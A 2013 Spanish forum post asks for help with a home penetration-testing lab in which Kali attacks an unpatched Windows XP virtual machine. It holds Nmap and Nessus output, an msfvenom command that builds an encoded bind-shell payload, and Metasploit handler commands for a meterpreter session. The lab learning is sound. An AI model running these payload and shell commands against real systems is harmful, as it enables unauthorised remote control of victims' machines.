ayuda con metasploit

Iniciado por nightcode, 30 Diciembre 2013, 15:50 PM

0 Miembros y 1 Visitante están viendo este tema.

nightcode

Ola amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:






Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!
"Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"